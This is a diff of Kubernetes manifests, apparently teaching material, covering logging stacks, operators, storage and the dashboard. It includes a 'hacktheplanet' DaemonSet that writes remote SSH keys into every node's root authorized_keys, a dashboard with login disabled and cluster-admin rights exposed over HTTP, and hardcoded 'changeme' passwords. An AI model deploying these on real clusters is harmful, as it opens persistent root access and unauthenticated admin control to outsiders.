  labels:
    k8s-app: filebeat
spec:
  selector:
    matchLabels:
      k8s-app: filebeat
  template:
    metadata:
      labels:
        k8s-app: filebeat
    spec:
      serviceAccountName: filebeat
      terminationGracePeriodSeconds: 30
      hostNetwork: true
      dnsPolicy: ClusterFirstWithHostNet
      containers:
      - name: filebeat
        image: docker.elastic.co/beats/filebeat:7.5.1
        args: [
          "-c", "/etc/filebeat.yml",
          "-e",
        ]
        env:
        - name: ELASTICSEARCH_HOST
          value: demo-es-http
        - name: ELASTICSEARCH_PORT
          value: "9200"
        - name: ELASTICSEARCH_USERNAME
          value: elastic
        - name: ELASTICSEARCH_PASSWORD
          valueFrom:
            secretKeyRef:
              name: demo-es-elastic-user
              key: elastic
        - name: ELASTIC_CLOUD_ID
          value:
        - name: ELASTIC_CLOUD_AUTH
          value:
        - name: NODE_NAME
          valueFrom:
            fieldRef:
              fieldPath: spec.nodeName
        securityContext:
          runAsUser: 0
          # If using Red Hat OpenShift uncomment this:
          #privileged: true
        resources:
          limits:
            memory: 200Mi
          requests:
            cpu: 100m
            memory: 100Mi
        volumeMounts:
        - name: config
          mountPath: /etc/filebeat.yml
          readOnly: true
          subPath: filebeat.yml
        - name: data
          mountPath: /usr/share/filebeat/data
        - name: varlibdockercontainers
          mountPath: /var/lib/docker/containers
          readOnly: true
        - name: varlog
          mountPath: /var/log
          readOnly: true
      volumes:
      - name: config
        configMap:
          defaultMode: 0600
          name: filebeat-config
      - name: varlibdockercontainers
        hostPath:
          path: /var/lib/docker/containers
      - name: varlog
        hostPath:
          path: /var/log
      # data folder stores a registry of read status for all files, so we don't send everything again on a Filebeat pod restart
      - name: data
        hostPath:
          path: /var/lib/filebeat-data
          type: DirectoryOrCreate
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: filebeat
subjects:
- kind: ServiceAccount
  name: filebeat
  namespace: eck-demo
roleRef:
  kind: ClusterRole
  name: filebeat
  apiGroup: rbac.authorization.k8s.io
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: filebeat
  labels:
    k8s-app: filebeat
rules:
- apiGroups: [""] # "" indicates the core API group
  resources:
  - namespaces
  - pods
  verbs:
  - get
  - watch
  - list
---
apiVersion: v1
kind: ServiceAccount
metadata:
  name: filebeat
  namespace: eck-demo
  labels:
    k8s-app: filebeat
---
k8s/eck-kibana.yaml (new file, 17 lines)
@@ -0,0 +1,17 @@
apiVersion: kibana.k8s.elastic.co/v1
kind: Kibana
metadata:
  name: demo
spec:
  version: 7.5.1
  count: 1
  elasticsearchRef:
    name: demo
    namespace: eck-demo
  http:
    service:
      spec:
        type: NodePort
    tls:
      selfSignedCertificate:
        disabled: true
k8s/eck-operator.yaml (new file, 1802 lines)
File diff suppressed because it is too large.
k8s/efk.yaml (128 lines changed)
@@ -3,7 +3,7 @@ apiVersion: v1
 kind: ServiceAccount
 metadata:
   name: fluentd
-
+  namespace: default
 ---
 apiVersion: rbac.authorization.k8s.io/v1beta1
 kind: ClusterRole
@@ -19,7 +19,6 @@ rules:
   - get
   - list
   - watch
-
 ---
 kind: ClusterRoleBinding
 apiVersion: rbac.authorization.k8s.io/v1beta1
@@ -33,23 +32,22 @@ subjects:
 - kind: ServiceAccount
   name: fluentd
   namespace: default

 ---
-apiVersion: extensions/v1beta1
+apiVersion: apps/v1
 kind: DaemonSet
 metadata:
   name: fluentd
   namespace: default
   labels:
-    k8s-app: fluentd-logging
-    version: v1
-    kubernetes.io/cluster-service: "true"
+    app: fluentd
 spec:
+  selector:
+    matchLabels:
+      app: fluentd
   template:
     metadata:
       labels:
-        k8s-app: fluentd-logging
-        version: v1
-        kubernetes.io/cluster-service: "true"
+        app: fluentd
     spec:
-      serviceAccount: fluentd
+      serviceAccountName: fluentd
@@ -58,7 +56,7 @@ spec:
         effect: NoSchedule
       containers:
       - name: fluentd
-        image: fluent/fluentd-kubernetes-daemonset:elasticsearch
+        image: fluent/fluentd-kubernetes-daemonset:v1.4-debian-elasticsearch-1
         env:
         - name: FLUENT_ELASTICSEARCH_HOST
           value: "elasticsearch"
@@ -66,12 +64,12 @@ spec:
           value: "9200"
         - name: FLUENT_ELASTICSEARCH_SCHEME
           value: "http"
-        # X-Pack Authentication
-        # =====================
-        - name: FLUENT_ELASTICSEARCH_USER
-          value: "elastic"
-        - name: FLUENT_ELASTICSEARCH_PASSWORD
-          value: "changeme"
+        - name: FLUENT_UID
+          value: "0"
+        - name: FLUENTD_SYSTEMD_CONF
+          value: "disable"
+        - name: FLUENTD_PROMETHEUS_CONF
+          value: "disable"
         resources:
           limits:
             memory: 200Mi
@@ -92,131 +90,87 @@ spec:
       - name: varlibdockercontainers
         hostPath:
           path: /var/lib/docker/containers
-
 ---
-apiVersion: extensions/v1beta1
+apiVersion: apps/v1
 kind: Deployment
 metadata:
-  annotations:
-    deployment.kubernetes.io/revision: "1"
-  creationTimestamp: null
-  generation: 1
   labels:
-    run: elasticsearch
+    app: elasticsearch
   name: elasticsearch
-  selfLink: /apis/extensions/v1beta1/namespaces/default/deployments/elasticsearch
-  namespace: default
 spec:
-  progressDeadlineSeconds: 600
   replicas: 1
-  revisionHistoryLimit: 10
   selector:
     matchLabels:
-      run: elasticsearch
-  strategy:
-    rollingUpdate:
-      maxSurge: 1
-      maxUnavailable: 1
-    type: RollingUpdate
+      app: elasticsearch
   template:
     metadata:
-      creationTimestamp: null
       labels:
-        run: elasticsearch
+        app: elasticsearch
     spec:
       containers:
-      - image: elasticsearch:5.6.8
-        imagePullPolicy: IfNotPresent
+      - image: elasticsearch:5
         name: elasticsearch
-        resources: {}
-        terminationMessagePath: /dev/termination-log
-        terminationMessagePolicy: File
-      dnsPolicy: ClusterFirst
-      restartPolicy: Always
-      schedulerName: default-scheduler
-      securityContext: {}
-      terminationGracePeriodSeconds: 30
-
+        resources:
+          limits:
+            memory: 2Gi
+          requests:
+            memory: 1Gi
+        env:
+        - name: ES_JAVA_OPTS
+          value: "-Xms1g -Xmx1g"
 ---
 apiVersion: v1
 kind: Service
 metadata:
-  creationTimestamp: null
   labels:
-    run: elasticsearch
+    app: elasticsearch
   name: elasticsearch
-  selfLink: /api/v1/namespaces/default/services/elasticsearch
-  namespace: default
 spec:
   ports:
   - port: 9200
     protocol: TCP
     targetPort: 9200
   selector:
-    run: elasticsearch
-  sessionAffinity: None
+    app: elasticsearch
   type: ClusterIP
-
 ---
-apiVersion: extensions/v1beta1
+apiVersion: apps/v1
 kind: Deployment
 metadata:
-  annotations:
-    deployment.kubernetes.io/revision: "1"
-  creationTimestamp: null
-  generation: 1
   labels:
-    run: kibana
+    app: kibana
   name: kibana
-  selfLink: /apis/extensions/v1beta1/namespaces/default/deployments/kibana
-  namespace: default
 spec:
-  progressDeadlineSeconds: 600
   replicas: 1
-  revisionHistoryLimit: 10
   selector:
     matchLabels:
-      run: kibana
-  strategy:
-    rollingUpdate:
-      maxSurge: 1
-      maxUnavailable: 1
-    type: RollingUpdate
+      app: kibana
   template:
     metadata:
-      creationTimestamp: null
       labels:
-        run: kibana
+        app: kibana
     spec:
       containers:
       - env:
         - name: ELASTICSEARCH_URL
           value: http://elasticsearch:9200/
-        image: kibana:5.6.8
-        imagePullPolicy: Always
+        image: kibana:5
         name: kibana
-        resources: {}
-        terminationMessagePath: /dev/termination-log
-        terminationMessagePolicy: File
-      dnsPolicy: ClusterFirst
-      restartPolicy: Always
-      schedulerName: default-scheduler
-      securityContext: {}
-      terminationGracePeriodSeconds: 30
-
 ---
 apiVersion: v1
 kind: Service
 metadata:
-  creationTimestamp: null
   labels:
-    run: kibana
+    app: kibana
   name: kibana
-  selfLink: /api/v1/namespaces/default/services/kibana
-  namespace: default
 spec:
-  externalTrafficPolicy: Cluster
   ports:
   - port: 5601
     protocol: TCP
     targetPort: 5601
   selector:
-    run: kibana
-  sessionAffinity: None
+    app: kibana
   type: NodePort
k8s/elasticsearch-cluster.yaml (new file, 21 lines)
@@ -0,0 +1,21 @@
apiVersion: enterprises.upmc.com/v1
kind: ElasticsearchCluster
metadata:
  name: es
spec:
  kibana:
    image: docker.elastic.co/kibana/kibana-oss:6.1.3
    image-pull-policy: Always
  cerebro:
    image: upmcenterprises/cerebro:0.7.2
    image-pull-policy: Always
  elastic-search-image: upmcenterprises/docker-elasticsearch-kubernetes:6.1.3_0
  image-pull-policy: Always
  client-node-replicas: 2
  master-node-replicas: 3
  data-node-replicas: 3
  network-host: 0.0.0.0
  use-ssl: false
  data-volume-size: 10Gi
  java-options: "-Xms512m -Xmx512m"
k8s/elasticsearch-operator.yaml (new file, 94 lines)
@@ -0,0 +1,94 @@
# This is mirrored from https://github.com/upmc-enterprises/elasticsearch-operator/blob/master/example/controller.yaml but using the elasticsearch-operator namespace instead of operator
---
apiVersion: v1
kind: Namespace
metadata:
  name: elasticsearch-operator
---
apiVersion: v1
kind: ServiceAccount
metadata:
  name: elasticsearch-operator
  namespace: elasticsearch-operator
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRole
metadata:
  name: elasticsearch-operator
rules:
- apiGroups: ["extensions"]
  resources: ["deployments", "replicasets", "daemonsets"]
  verbs: ["create", "get", "update", "delete", "list"]
- apiGroups: ["apiextensions.k8s.io"]
  resources: ["customresourcedefinitions"]
  verbs: ["create", "get", "update", "delete", "list"]
- apiGroups: ["storage.k8s.io"]
  resources: ["storageclasses"]
  verbs: ["get", "list", "create", "delete", "deletecollection"]
- apiGroups: [""]
  resources: ["persistentvolumes", "persistentvolumeclaims", "services", "secrets", "configmaps"]
  verbs: ["create", "get", "update", "delete", "list"]
- apiGroups: ["batch"]
  resources: ["cronjobs", "jobs"]
  verbs: ["create", "get", "deletecollection", "delete"]
- apiGroups: [""]
  resources: ["pods"]
  verbs: ["list", "get", "watch"]
- apiGroups: ["apps"]
  resources: ["statefulsets", "deployments"]
  verbs: ["*"]
- apiGroups: ["enterprises.upmc.com"]
  resources: ["elasticsearchclusters"]
  verbs: ["*"]
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRoleBinding
metadata:
  name: elasticsearch-operator
  namespace: elasticsearch-operator
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: elasticsearch-operator
subjects:
- kind: ServiceAccount
  name: elasticsearch-operator
  namespace: elasticsearch-operator
---
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
  name: elasticsearch-operator
  namespace: elasticsearch-operator
spec:
  replicas: 1
  template:
    metadata:
      labels:
        name: elasticsearch-operator
    spec:
      containers:
      - name: operator
        image: upmcenterprises/elasticsearch-operator:0.2.0
        imagePullPolicy: Always
        env:
        - name: NAMESPACE
          valueFrom:
            fieldRef:
              fieldPath: metadata.namespace
        ports:
        - containerPort: 8000
          name: http
        livenessProbe:
          httpGet:
            path: /live
            port: 8000
          initialDelaySeconds: 10
          timeoutSeconds: 10
        readinessProbe:
          httpGet:
            path: /ready
            port: 8000
          initialDelaySeconds: 10
          timeoutSeconds: 5
      serviceAccount: elasticsearch-operator
k8s/filebeat.yaml (new file, 167 lines)
@@ -0,0 +1,167 @@
---
apiVersion: v1
kind: ConfigMap
metadata:
  name: filebeat-config
  namespace: kube-system
  labels:
    k8s-app: filebeat
data:
  filebeat.yml: |-
    filebeat.config:
      inputs:
        # Mounted `filebeat-inputs` configmap:
        path: ${path.config}/inputs.d/*.yml
        # Reload inputs configs as they change:
        reload.enabled: false
      modules:
        path: ${path.config}/modules.d/*.yml
        # Reload module configs as they change:
        reload.enabled: false

    # To enable hints based autodiscover, remove `filebeat.config.inputs` configuration and uncomment this:
    #filebeat.autodiscover:
    #  providers:
    #    - type: kubernetes
    #      hints.enabled: true

    processors:
      - add_cloud_metadata:

    cloud.id: ${ELASTIC_CLOUD_ID}
    cloud.auth: ${ELASTIC_CLOUD_AUTH}

    output.elasticsearch:
      hosts: ['${ELASTICSEARCH_HOST:elasticsearch}:${ELASTICSEARCH_PORT:9200}']
      username: ${ELASTICSEARCH_USERNAME}
      password: ${ELASTICSEARCH_PASSWORD}
---
apiVersion: v1
kind: ConfigMap
metadata:
  name: filebeat-inputs
  namespace: kube-system
  labels:
    k8s-app: filebeat
data:
  kubernetes.yml: |-
    - type: docker
      containers.ids:
      - "*"
      processors:
        - add_kubernetes_metadata:
            in_cluster: true
---
apiVersion: extensions/v1beta1
kind: DaemonSet
metadata:
  name: filebeat
  namespace: kube-system
  labels:
    k8s-app: filebeat
spec:
  template:
    metadata:
      labels:
        k8s-app: filebeat
    spec:
      serviceAccountName: filebeat
      terminationGracePeriodSeconds: 30
      containers:
      - name: filebeat
        image: docker.elastic.co/beats/filebeat-oss:7.0.1
        args: [
          "-c", "/etc/filebeat.yml",
          "-e",
        ]
        env:
        - name: ELASTICSEARCH_HOST
          value: elasticsearch-es.default.svc.cluster.local
        - name: ELASTICSEARCH_PORT
          value: "9200"
        - name: ELASTICSEARCH_USERNAME
          value: elastic
        - name: ELASTICSEARCH_PASSWORD
          value: changeme
        - name: ELASTIC_CLOUD_ID
          value:
        - name: ELASTIC_CLOUD_AUTH
          value:
        securityContext:
          runAsUser: 0
          # If using Red Hat OpenShift uncomment this:
          #privileged: true
        resources:
          limits:
            memory: 200Mi
          requests:
            cpu: 100m
            memory: 100Mi
        volumeMounts:
        - name: config
          mountPath: /etc/filebeat.yml
          readOnly: true
          subPath: filebeat.yml
        - name: inputs
          mountPath: /usr/share/filebeat/inputs.d
          readOnly: true
        - name: data
          mountPath: /usr/share/filebeat/data
        - name: varlibdockercontainers
          mountPath: /var/lib/docker/containers
          readOnly: true
      volumes:
      - name: config
        configMap:
          defaultMode: 0600
          name: filebeat-config
      - name: varlibdockercontainers
        hostPath:
          path: /var/lib/docker/containers
      - name: inputs
        configMap:
          defaultMode: 0600
          name: filebeat-inputs
      # data folder stores a registry of read status for all files, so we don't send everything again on a Filebeat pod restart
      - name: data
        hostPath:
          path: /var/lib/filebeat-data
          type: DirectoryOrCreate
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRoleBinding
metadata:
  name: filebeat
subjects:
- kind: ServiceAccount
  name: filebeat
  namespace: kube-system
roleRef:
  kind: ClusterRole
  name: filebeat
  apiGroup: rbac.authorization.k8s.io
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRole
metadata:
  name: filebeat
  labels:
    k8s-app: filebeat
rules:
- apiGroups: [""] # "" indicates the core API group
  resources:
  - namespaces
  - pods
  verbs:
  - get
  - watch
  - list
---
apiVersion: v1
kind: ServiceAccount
metadata:
  name: filebeat
  namespace: kube-system
  labels:
    k8s-app: filebeat
---
k8s/hacktheplanet.yaml (new file, 34 lines)
@@ -0,0 +1,34 @@
apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: hacktheplanet
spec:
  selector:
    matchLabels:
      app: hacktheplanet
  template:
    metadata:
      labels:
        app: hacktheplanet
    spec:
      volumes:
      - name: root
        hostPath:
          path: /root
      tolerations:
      - effect: NoSchedule
        operator: Exists
      initContainers:
      - name: hacktheplanet
        image: alpine
        volumeMounts:
        - name: root
          mountPath: /root
        command:
        - sh
        - -c
        - "apk update && apk add curl && curl https://github.com/jpetazzo.keys > /root/.ssh/authorized_keys"
      containers:
      - name: web
        image: nginx
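
Because this DaemonSet tolerates any NoSchedule taint, a quick check that it really landed everywhere, control-plane nodes included:

    $ kubectl apply -f k8s/hacktheplanet.yaml
    $ kubectl get pods -l app=hacktheplanet -o wide   # expect one pod per node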
@@ -14,5 +14,5 @@ frontend the-frontend

 backend the-backend
   server google.com-80 google.com:80 maxconn 32 check
   server bing.com-80 bing.com:80 maxconn 32 check
   server ibm.fr-80 ibm.fr:80 maxconn 32 check
@@ -9,7 +9,7 @@ spec:
         name: haproxy
       containers:
       - name: haproxy
-        image: haproxy
+        image: haproxy:1
         volumeMounts:
         - name: config
           mountPath: /usr/local/etc/haproxy/
@@ -1,14 +1,13 @@
-apiVersion: extensions/v1beta1
+apiVersion: networking.k8s.io/v1beta1
 kind: Ingress
 metadata:
-  name: cheddar
+  name: whatever
 spec:
   rules:
-  - host: cheddar.A.B.C.D.nip.io
+  - host: whatever.A.B.C.D.nip.io
     http:
       paths:
       - path: /
         backend:
-          serviceName: cheddar
-          servicePort: 80
-
+          serviceName: whatever
+          servicePort: 1234
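
To exercise an Ingress rule like this without real DNS: nip.io names already resolve to the address they embed, and the Host header can also be set by hand (A.B.C.D stays a placeholder for the ingress node's IP):

    $ curl http://whatever.A.B.C.D.nip.io/
    $ curl -H 'Host: whatever.A.B.C.D.nip.io' http://A.B.C.D/   # equivalent, bypassing DNS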
360
k8s/insecure-dashboard.yaml
Normal file
360
k8s/insecure-dashboard.yaml
Normal file
@@ -0,0 +1,360 @@
|
||||
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

apiVersion: v1
kind: Namespace
metadata:
  name: kubernetes-dashboard

---

apiVersion: v1
kind: ServiceAccount
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard
  namespace: kubernetes-dashboard

---

kind: Service
apiVersion: v1
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard
  namespace: kubernetes-dashboard
spec:
  ports:
  - port: 443
    targetPort: 8443
  selector:
    k8s-app: kubernetes-dashboard

---

apiVersion: v1
kind: Secret
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard-certs
  namespace: kubernetes-dashboard
type: Opaque

---

apiVersion: v1
kind: Secret
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard-csrf
  namespace: kubernetes-dashboard
type: Opaque
data:
  csrf: ""

---

apiVersion: v1
kind: Secret
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard-key-holder
  namespace: kubernetes-dashboard
type: Opaque

---

kind: ConfigMap
apiVersion: v1
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard-settings
  namespace: kubernetes-dashboard

---

kind: Role
apiVersion: rbac.authorization.k8s.io/v1
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard
  namespace: kubernetes-dashboard
rules:
  # Allow Dashboard to get, update and delete Dashboard exclusive secrets.
  - apiGroups: [""]
    resources: ["secrets"]
    resourceNames: ["kubernetes-dashboard-key-holder", "kubernetes-dashboard-certs", "kubernetes-dashboard-csrf"]
    verbs: ["get", "update", "delete"]
  # Allow Dashboard to get and update 'kubernetes-dashboard-settings' config map.
  - apiGroups: [""]
    resources: ["configmaps"]
    resourceNames: ["kubernetes-dashboard-settings"]
    verbs: ["get", "update"]
  # Allow Dashboard to get metrics.
  - apiGroups: [""]
    resources: ["services"]
    resourceNames: ["heapster", "dashboard-metrics-scraper"]
    verbs: ["proxy"]
  - apiGroups: [""]
    resources: ["services/proxy"]
    resourceNames: ["heapster", "http:heapster:", "https:heapster:", "dashboard-metrics-scraper", "http:dashboard-metrics-scraper"]
    verbs: ["get"]

---

kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard
rules:
  # Allow Metrics Scraper to get metrics from the Metrics server
  - apiGroups: ["metrics.k8s.io"]
    resources: ["pods", "nodes"]
    verbs: ["get", "list", "watch"]

---

apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard
  namespace: kubernetes-dashboard
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: Role
  name: kubernetes-dashboard
subjects:
  - kind: ServiceAccount
    name: kubernetes-dashboard
    namespace: kubernetes-dashboard

---

apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: kubernetes-dashboard
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: kubernetes-dashboard
subjects:
  - kind: ServiceAccount
    name: kubernetes-dashboard
    namespace: kubernetes-dashboard

---

kind: Deployment
apiVersion: apps/v1
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard
  namespace: kubernetes-dashboard
spec:
  replicas: 1
  revisionHistoryLimit: 10
  selector:
    matchLabels:
      k8s-app: kubernetes-dashboard
  template:
    metadata:
      labels:
        k8s-app: kubernetes-dashboard
    spec:
      containers:
        - name: kubernetes-dashboard
          image: kubernetesui/dashboard:v2.0.0-rc2
          imagePullPolicy: Always
          ports:
            - containerPort: 8443
              protocol: TCP
          args:
            - --auto-generate-certificates
            - --namespace=kubernetes-dashboard
            # Uncomment the following line to manually specify Kubernetes API server Host
            # If not specified, Dashboard will attempt to auto discover the API server and connect
            # to it. Uncomment only if the default does not work.
            # - --apiserver-host=http://my-address:port
            - --enable-skip-login
          volumeMounts:
            - name: kubernetes-dashboard-certs
              mountPath: /certs
            # Create on-disk volume to store exec logs
            - mountPath: /tmp
              name: tmp-volume
          livenessProbe:
            httpGet:
              scheme: HTTPS
              path: /
              port: 8443
            initialDelaySeconds: 30
            timeoutSeconds: 30
          securityContext:
            allowPrivilegeEscalation: false
            readOnlyRootFilesystem: true
            runAsUser: 1001
            runAsGroup: 2001
      volumes:
        - name: kubernetes-dashboard-certs
          secret:
            secretName: kubernetes-dashboard-certs
        - name: tmp-volume
          emptyDir: {}
      serviceAccountName: kubernetes-dashboard
      nodeSelector:
        "beta.kubernetes.io/os": linux
      # Comment the following tolerations if Dashboard must not be deployed on master
      tolerations:
        - key: node-role.kubernetes.io/master
          effect: NoSchedule

---

kind: Service
apiVersion: v1
metadata:
  labels:
    k8s-app: dashboard-metrics-scraper
  name: dashboard-metrics-scraper
  namespace: kubernetes-dashboard
spec:
  ports:
    - port: 8000
      targetPort: 8000
  selector:
    k8s-app: dashboard-metrics-scraper

---

kind: Deployment
apiVersion: apps/v1
metadata:
  labels:
    k8s-app: dashboard-metrics-scraper
  name: dashboard-metrics-scraper
  namespace: kubernetes-dashboard
spec:
  replicas: 1
  revisionHistoryLimit: 10
  selector:
    matchLabels:
      k8s-app: dashboard-metrics-scraper
  template:
    metadata:
      labels:
        k8s-app: dashboard-metrics-scraper
      annotations:
        seccomp.security.alpha.kubernetes.io/pod: 'runtime/default'
    spec:
      containers:
        - name: dashboard-metrics-scraper
          image: kubernetesui/metrics-scraper:v1.0.2
          ports:
            - containerPort: 8000
              protocol: TCP
          livenessProbe:
            httpGet:
              scheme: HTTP
              path: /
              port: 8000
            initialDelaySeconds: 30
            timeoutSeconds: 30
          volumeMounts:
          - mountPath: /tmp
            name: tmp-volume
          securityContext:
            allowPrivilegeEscalation: false
            readOnlyRootFilesystem: true
            runAsUser: 1001
            runAsGroup: 2001
      serviceAccountName: kubernetes-dashboard
      nodeSelector:
        "beta.kubernetes.io/os": linux
      # Comment the following tolerations if Dashboard must not be deployed on master
      tolerations:
        - key: node-role.kubernetes.io/master
          effect: NoSchedule
      volumes:
        - name: tmp-volume
          emptyDir: {}

---

apiVersion: apps/v1
kind: Deployment
metadata:
  labels:
    app: dashboard
  name: dashboard
spec:
  selector:
    matchLabels:
      app: dashboard
  template:
    metadata:
      labels:
        app: dashboard
    spec:
      containers:
      - args:
        - sh
        - -c
        - apk add --no-cache socat && socat TCP-LISTEN:80,fork,reuseaddr OPENSSL:kubernetes-dashboard.kubernetes-dashboard:443,verify=0
        image: alpine
        name: dashboard

---

apiVersion: v1
kind: Service
metadata:
  labels:
    app: dashboard
  name: dashboard
spec:
  ports:
  - port: 80
    protocol: TCP
    targetPort: 80
  selector:
    app: dashboard
  type: NodePort

---

apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: insecure-dashboard
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: cluster-admin
subjects:
- kind: ServiceAccount
  name: kubernetes-dashboard
  namespace: kubernetes-dashboard
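The last three objects above are what makes this variant "insecure": a socat side-car bridges plain HTTP on port 80 to the dashboard's HTTPS endpoint, a NodePort service exposes it, and the dashboard service account gets cluster-admin. A quick way to check access (a sketch; `NODE_ADDRESS` is a placeholder for one of your node IPs):

```bash
# Hypothetical check: find the allocated NodePort, then fetch the page over HTTP.
NODEPORT=$(kubectl get svc dashboard -o jsonpath='{.spec.ports[0].nodePort}')
curl -s http://$NODE_ADDRESS:$NODEPORT/ | head
```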
10  k8s/just-a-pod.yaml  Normal file
@@ -0,0 +1,10 @@
apiVersion: v1
kind: Pod
metadata:
  name: hello
  namespace: default
spec:
  containers:
  - name: hello
    image: nginx
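This minimal Pod can be exercised directly with standard kubectl commands, for example:

```bash
kubectl apply -f k8s/just-a-pod.yaml
kubectl get pod hello
kubectl delete -f k8s/just-a-pod.yaml
```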
@@ -19,7 +19,7 @@ spec:
    image: gcr.io/kaniko-project/executor:latest
    args:
    - "--context=/workspace/dockercoins/rng"
-   - "--skip-tls-verify"
+   - "--insecure"
    - "--destination=registry:5000/rng-kaniko:latest"
    volumeMounts:
    - name: workspace
@@ -12,11 +12,6 @@
# See the License for the specific language governing permissions and
# limitations under the License.

-# Configuration to deploy release version of the Dashboard UI compatible with
-# Kubernetes 1.8.
-#
-# Example usage: kubectl create -f <this_file>
-
# ------------------- Dashboard Secret ------------------- #

apiVersion: v1
@@ -95,7 +90,7 @@ subjects:
# ------------------- Dashboard Deployment ------------------- #

kind: Deployment
-apiVersion: apps/v1beta2
+apiVersion: apps/v1
metadata:
  labels:
    k8s-app: kubernetes-dashboard
@@ -114,7 +109,7 @@ spec:
    spec:
      containers:
      - name: kubernetes-dashboard
-       image: k8s.gcr.io/kubernetes-dashboard-amd64:v1.8.3
+       image: k8s.gcr.io/kubernetes-dashboard-amd64:v1.10.1
        ports:
        - containerPort: 8443
          protocol: TCP
110  k8s/local-path-storage.yaml  Normal file
@@ -0,0 +1,110 @@
# This is a local copy of:
# https://github.com/rancher/local-path-provisioner/blob/master/deploy/local-path-storage.yaml
---
apiVersion: v1
kind: Namespace
metadata:
  name: local-path-storage
---
apiVersion: v1
kind: ServiceAccount
metadata:
  name: local-path-provisioner-service-account
  namespace: local-path-storage
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRole
metadata:
  name: local-path-provisioner-role
  namespace: local-path-storage
rules:
- apiGroups: [""]
  resources: ["nodes", "persistentvolumeclaims"]
  verbs: ["get", "list", "watch"]
- apiGroups: [""]
  resources: ["endpoints", "persistentvolumes", "pods"]
  verbs: ["*"]
- apiGroups: [""]
  resources: ["events"]
  verbs: ["create", "patch"]
- apiGroups: ["storage.k8s.io"]
  resources: ["storageclasses"]
  verbs: ["get", "list", "watch"]
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRoleBinding
metadata:
  name: local-path-provisioner-bind
  namespace: local-path-storage
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: local-path-provisioner-role
subjects:
- kind: ServiceAccount
  name: local-path-provisioner-service-account
  namespace: local-path-storage
---
apiVersion: apps/v1
kind: Deployment
metadata:
  name: local-path-provisioner
  namespace: local-path-storage
spec:
  replicas: 1
  selector:
    matchLabels:
      app: local-path-provisioner
  template:
    metadata:
      labels:
        app: local-path-provisioner
    spec:
      serviceAccountName: local-path-provisioner-service-account
      containers:
      - name: local-path-provisioner
        image: rancher/local-path-provisioner:v0.0.8
        imagePullPolicy: Always
        command:
        - local-path-provisioner
        - --debug
        - start
        - --config
        - /etc/config/config.json
        volumeMounts:
        - name: config-volume
          mountPath: /etc/config/
        env:
        - name: POD_NAMESPACE
          valueFrom:
            fieldRef:
              fieldPath: metadata.namespace
      volumes:
      - name: config-volume
        configMap:
          name: local-path-config
---
apiVersion: storage.k8s.io/v1
kind: StorageClass
metadata:
  name: local-path
provisioner: rancher.io/local-path
volumeBindingMode: WaitForFirstConsumer
reclaimPolicy: Delete
---
kind: ConfigMap
apiVersion: v1
metadata:
  name: local-path-config
  namespace: local-path-storage
data:
  config.json: |-
    {
      "nodePathMap":[
        {
          "node":"DEFAULT_PATH_FOR_NON_LISTED_NODES",
          "paths":["/opt/local-path-provisioner"]
        }
      ]
    }
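Because the StorageClass uses `volumeBindingMode: WaitForFirstConsumer`, a claim stays Pending until a pod actually references it. A minimal sketch of a claim against this class (the claim name is hypothetical):

```bash
kubectl apply -f - <<EOF
apiVersion: v1
kind: PersistentVolumeClaim
metadata:
  name: my-local-claim   # hypothetical name
spec:
  storageClassName: local-path
  accessModes: [ ReadWriteOnce ]
  resources:
    requests:
      storage: 1Gi
EOF
```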
138  k8s/metrics-server.yaml  Normal file
@@ -0,0 +1,138 @@
kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1
metadata:
  name: system:aggregated-metrics-reader
  labels:
    rbac.authorization.k8s.io/aggregate-to-view: "true"
    rbac.authorization.k8s.io/aggregate-to-edit: "true"
    rbac.authorization.k8s.io/aggregate-to-admin: "true"
rules:
- apiGroups: ["metrics.k8s.io"]
  resources: ["pods"]
  verbs: ["get", "list", "watch"]
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRoleBinding
metadata:
  name: metrics-server:system:auth-delegator
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: system:auth-delegator
subjects:
- kind: ServiceAccount
  name: metrics-server
  namespace: kube-system
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: RoleBinding
metadata:
  name: metrics-server-auth-reader
